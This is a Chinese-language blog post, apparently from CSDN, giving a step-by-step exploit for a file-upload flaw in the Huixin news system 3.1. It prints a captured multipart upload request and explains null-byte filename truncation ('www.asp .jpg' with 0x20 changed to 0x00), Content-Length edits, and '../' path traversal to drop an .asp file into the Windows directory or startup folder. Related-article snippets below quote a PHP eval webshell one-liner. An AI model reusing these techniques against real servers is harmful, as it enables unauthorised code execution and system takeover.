文件上传漏洞在惠信中的应用

最新推荐文章于 2022-10-09 21:06:19 发布
最新推荐文章于 2022-10-09 21:06:19 发布
阅读量892 收藏
点赞数
文章标签: vbscript windows upload exe file
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/packet/article/details/387745
版权

近来大家为dvbbs的文件上传漏洞兴奋不已,想想在其他的系统里面能不能用的上呢?我就以惠信新闻系统来抛砖引玉吧!
惠信新闻系统3.1 windows2000+sp4
先看这句代码。admin_uploadfilesave.asp
...............
Server.mappath(formPath&file.FileName)
............................
保存时用路径+文件名+后缀名,那我们可以用dvbbs上的漏洞了,只不过我们改的是文件名(因为系统有固定的路径 ,改路径的话,上传不会成功)
这是我捕获的数据:
POST /admin_uploadfilesave.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer: http://127.0.0.1/admin_uploadfile.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d42cb1f101ae
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 127.0.0.1
Content-Length: 658
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDCSACQQRQ=GKCHPMAACAKICGCMGMMBCLAL

-----------------------------7d42cb1f101ae
Content-Disposition: form-data; name="act"

upload
-----------------------------7d42cb1f101ae
Content-Disposition: form-data; name="upcount"

1
-----------------------------7d42cb1f101ae
Content-Disposition: form-data; name="filepath"

newstxt/
-----------------------------7d42cb1f101ae
Content-Disposition: form-data; name="file1"; filename="G:/www.asp .jpg"
Content-Type: text/plain

<% language=vbscript %>
<ihihoiojpojppokkhhkhkhkhk
hkhjkjkjjlkkkkkk>

-----------------------------7d42cb1f101ae
Content-Disposition: form-data; name="Submit"

提交
-----------------------------7d42cb1f101ae--
我将其中filename 处改为www.asp+(空格).jpg,同dvbbs利用一样改content_length的长度,然后用编辑器修改空格十六进制20为00,上传成功!呵呵!

再看路径我们不能改,那能不能利用../../这样的方式回切呢?试试就知道了,捕获数据同上,将name="filepath"
newstxt/ 改为: newstxt/../../../winnt
content-length:658 改为:(658+14)672
好,开始上传,哈哈!在winnt下发现www.asp文件。那我们就可以将路径改为windows的自启动目录,上传exe,vbs,bat...文件。不过以上都要在获得新闻系统的管理者之后,进一步进入。

hardpin100@yahoo.com.cn

packet
关注
文件上传漏洞及常见的利用方式
易编橙 · 终身成长社群,相遇已是上上签!
01-08 6339
文章目录概述“文件上传漏洞与“WebShell”文件上传漏洞的原理“文件上传漏洞”被利用植入“WebShell”后的常见安全问题:上传检测流程概述上传服务器文件命名规则常见的检测方式“文件上传漏洞”-本地验证检测绕过客户端本地JS绕过(Javascript检测)客户端白名单绕过“文件上传漏洞”-服务端检测绕过服务端检测绕过(MIME类型检测)服务端目录路经检测filepath路经修改绕过服务端文件扩展名检测黑名单检测如何绕过黑名单白名单册检测如何绕过白名单服务端文件内容检测绕过绕过文件头检测文件相关信息检
文件上传漏洞的利用和防御
最新发布
qq_61714717的博客
12-12 4418
文件上传漏洞的学习
常见文件上传漏洞利用
weixin_44414845的博客
12-14 4213
文件上传漏洞利用一、常见文件上传绕过方法1.javascript验证突破2.大小写突破3.服务器文件扩展名检测(不符合服务器端规定规则则不让上传)4.特殊后缀名绕过5.MIME类型6.文件内容检测7.图片马8.使用分布式配置9.文件截断10.编辑器漏洞1)ckfinder2)FCKeditor11.服务器解析漏洞1)apache解析漏洞未知后缀解析漏洞换行解析漏洞2)IIS6.0解析漏洞目录解析 ...
文件上传漏洞
金色%夕阳的博客
04-29 2395
文件上传漏洞 1. 文件上传功能 文件上传功能是大部分WEB应用的必备功能,站点常见文件上传点有:用户头像上传、社交类网站允许用户上传照片、服务类网站需要用户上传证明材料的电子档、电商类网站允许用户上传图片展示商品情况等。然而,看似普通的文件上传功能如果缺法安全防护措施,就存在巨大的安全风险。 2. 文件上传漏洞 文件上传漏洞是指攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。通常是因web应用程序没有对上传的文件进行安全判断或者判断条件不够严谨,
文件上传漏洞常见利用方式分析
yes_angel的博客
06-11 1万+
原理 文件上传是Web应用经常出现的功能,它允许用户上传文件到服务器并保存到特定位置。这对安全来说是一个很敏感的问题,一旦恶意程序被上传到服务器并获得执行权限,后果将不堪设想。因此绝大多数的Web应用都对文件上传功能有很多限制。 文件上传漏洞指攻击者利用程序缺陷绕过系统对文件的验证与处理策略将恶意程序上传到服务器并获得执行服务器端命令的能力。这种攻击方式直接、有效,在对付某些脆弱的系统
惠信新闻系统
08-25
修正附件上传错误,改为只许可已添加的上传文件类型,防止不可知的危险文件类型上传; 首页新闻和栏目采用JS调用,由后台相应生成; 设计方案可以导出保存或传送,生成的SQL脚本可以通过SQL查询器添加方案; 注册...
惠信新闻系统 调用插件 新闻调用插件ASP全能调用代码
12-13
在【惠信新闻系统调用插件 新闻调用差价 ASP全能调用代码】这个压缩包,你应该能找到所有必要的源代码文件,包括ASP页面、数据库连接文件、模板文件等。你可以通过阅读和分析这些代码来了解其工作原理,并将其应用...
惠信新闻系统 v3.1 商业版 for Access
08-29
惠信新闻系统,Access用于存储新闻标题、内容、作者、布时间等信息,便于快速检索和分类。 2. 用户界面:系统提供友好的用户界面,使得非技术背景的员工也能轻松操作。用户可以方便地添加、修改、删除新闻,...
惠信新闻系统4.0(SQL)动态正式版本
02-23
五级管理员:新闻录入员、小类管理(审核)员、大类管理员、高级管理员、超级管理员录入员权限:只能在自己的小类录入新闻,在未经审核的文章可以自由修改、删除。小录管理员:也就是大家所说的新闻审核员,相当于小...
典型漏洞归纳之上传漏洞
weixin_30911451的博客
02-21 1802
0x01 概要说明 文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞,因为用它获得服务器权限最快最直接。但是想真正把这个漏洞利用好却不那么容易,其有很多技巧,也有很多需要掌握的知识。俗话说,知己知彼方能百战不殆,因此想要研究怎么防护漏洞,就要了解怎么去利用。此篇文章主要分三部分:总结一些常见的上传文件校验方式,以及绕过校验的各种姿势,最后对此漏洞提几点防护建议。 from : http:/...
文件上传漏洞利用与利用
weixin_45178890的博客
08-01 1264
文件上传漏洞 可以上传一句话木马 PHP一句话木马如下 木马的连接密码是value <?php @eval($_POST[value]);?> 我们看到这个地方有一个上传点 然后我们上传一个php的脚本看能不能上传成功 然后我们看到没有上传成功被拦截了 看一下源代码是什么 function checkFile() { var file = document.getE...
文件上传漏洞利用
m0_61506558的博客
10-09 1534
基于靶场的练习,决定把文件上传漏洞再进行总结,整体可以分为间件解析漏洞、CMS漏洞、编辑器漏洞、CVE漏洞和其他,由于本人水平有限,如有问题,请师傅留言,一起进步!!!(一)基本介绍不理解漏洞原理的,可以看看下面文章哈文件上传漏洞__Cyber的博客-CSDN博客_常见的文件上传漏洞(二)利用思路对文件上传类型进行区分,是属于编辑器文件上传,还是属于第三方应用,还是会员心。要确保文件上传是什么类型,就用什么类型方法对它进行后期的测试。
文件上传漏洞是什么?要怎样防御文件上传漏洞攻击?
Mr.ROBOT
03-16 1万+
文件上传漏洞是什么?怎样防御文件上传漏洞攻击?文件上传漏洞是web安全经常利用到的一种漏洞形式。这种类型的攻击从大的类型上来说,是攻击 数据与代码分离原则 的一种攻击。 一些web应用程序允许上传图片,文本或者其他资源到指定的位置,文件上传漏洞就是利用这些可以上传的地方将恶意代码植入到服务器,再通过url去访问以执行代码 造成文件上传漏洞的原因是 对于上传文件的后缀名(扩展名)没有做较
文件上传漏洞攻击与防范方法
热门推荐
m0_38103658的博客
08-30 4万+
文件上传漏洞攻击与防范方法 文件上传漏洞简介: 文件上传漏洞是web安全经常用到的一种漏洞形式。是对数据与代码分离原则的一种攻击。上传漏洞顾名思义,就是攻击者上传了一个可执行文件如木马,病毒,恶意脚本,WebShell等到服务器执行,并最终获得网站控制权限的高危漏洞文件上传漏洞危害: 上传漏洞与SQL注入或 XSS相比 , 其风险更大 , 如果 Web应用程序存在上传漏洞 , 攻击者上传...
文件上传漏洞详解
Ephemerally的博客
03-27 1499
文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的。上传的文件可以是木马,病毒,恶意脚本等等。“文件上传”本身并没有任何问题,但是文件上传后,服务器怎么处理、解释文件就成了一个问题。如果服务器的处理逻辑做得不够安全,则会导致严重的后果。 常见的文件上传之后容易导致的安全问题: 上传的是Web脚本语言,服务器的Web容器解释...
文件上传漏洞利用总结
river
09-27 2757
这几天一直在看文件上传漏洞,很多大牛总结了很多姿势,学习一下。 (1)一般上传检测流程**^_^ 客户端javascript校验(一般只校验文件的扩展名)** 绕过方法:一般都是在还没有点击上传按钮时候就弹出对话框,可以利用Burpsuit代理抓包,修改文件扩展名。 也可以用firebug之类的审查元素工具,禁掉判断扩展名的javascript脚本。**^_^ 服务端校验**
文件上传漏洞原理和利用
VictorZhang
08-06 3524
文件上传 1.前段选择文件,提交文件 2.浏览器形成POST MultiPart报文送到服务器 3.服务器间件接收到报文,解析后交给后端代码进行处理 4.后端代码将上传的文件内容写入到临时文件(PHP特有) 5.写入到文件,文件名为提交的文件名或以一定规则生成的文件名 文件上传漏洞 1.未对上传文件进行严格的验证和过滤时,容易造成动态文件asp/php/jsp等等 2.如果上传的目标目录没...
ASP上传漏洞实战揭秘与扩展利用
本文将深入探讨ASP上传漏洞的实例分析和实战入侵策略,特别是在网络上广泛存在的程序漏洞,如任我飞扬整站程序、动感购物商城、秋叶商城和惠信新闻系统等。上传漏洞通常通过Form表单提交被利用,攻击者的目标是获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值